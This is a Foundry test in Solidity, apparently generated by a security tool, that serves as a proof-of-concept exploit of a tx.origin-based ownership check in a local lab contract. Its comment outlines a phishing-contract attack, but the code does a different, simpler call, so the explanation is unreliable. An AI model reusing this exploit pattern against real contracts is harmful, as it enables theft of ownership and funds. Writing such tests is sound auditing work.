// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "forge-std/Test.sol";
import "forge-std/console.sol";

/**
 * ╔═══════════════════════════════════════════════════════════════════╗
 * ║  AGL DYNAMIC PoC #1 — Auto-Generated Exploit Test           ║
 * ╚═══════════════════════════════════════════════════════════════════╝
 *
 * CONTRACT:      tx_origin_auth
 * FUNCTION:      transferOwnership
 * VULNERABILITY: ACCESS CONTROL
 * SEVERITY:      high
 * CONFIDENCE:    100.0%
 * VERDICT:       EXPLOITABLE: transferOwnership() — Z3 SAT with concrete values, invariant 'access_gated' violated. A
 *
 * ATTACK STEPS:
 *   1. 1. Attacker deploys PhishingContract
 *   2. 2. PhishingContract.attack() calls target.transferOwnership(attacker_addr, balance)
 *   3. 3. Inside transferOwnership(): require(tx.origin == owner) → PASSES
 *   4.    Because tx.origin = victim (who initiated the outer tx)
 *   5. 4. Funds transferred to attacker's address
 *   6. 5. INVARIANT BROKEN: access_gated — non-owner executed privileged function
 *
 * GENERATED BY:  AGL Security Tool — Dynamic PoC Generator
 * DATE:          2026-03-27 03:45
 */

import "../../tx_origin_auth.sol";

contract PoC_AccessControl_tx_origin_auth_Test is Test {
    tx_origin_auth public target;

    function setUp() public {
        target = new tx_origin_auth();
    }

    function test_access_control_bypass() public {
        console.log("=== AGL PoC: Access Control in tx_origin_auth.transferOwnership ===");

        address attacker = makeAddr("attacker");

        // Try calling the unprotected function as a non-owner
        vm.prank(attacker);

        // Low-level call with correct signature
        (bool success, ) = address(target).call(
            abi.encodeWithSignature("transferOwnership(address)", attacker)
        );

        if (success) {
            console.log("[CONFIRMED] Access control missing on transferOwnership!");
            console.log("  Non-owner was able to call privileged function");
        } else {
            console.log("[SAFE] Function correctly reverted for non-owner");
        }

        assertTrue(success, "Access control bypass: non-owner should succeed on unprotected function");
    }
}
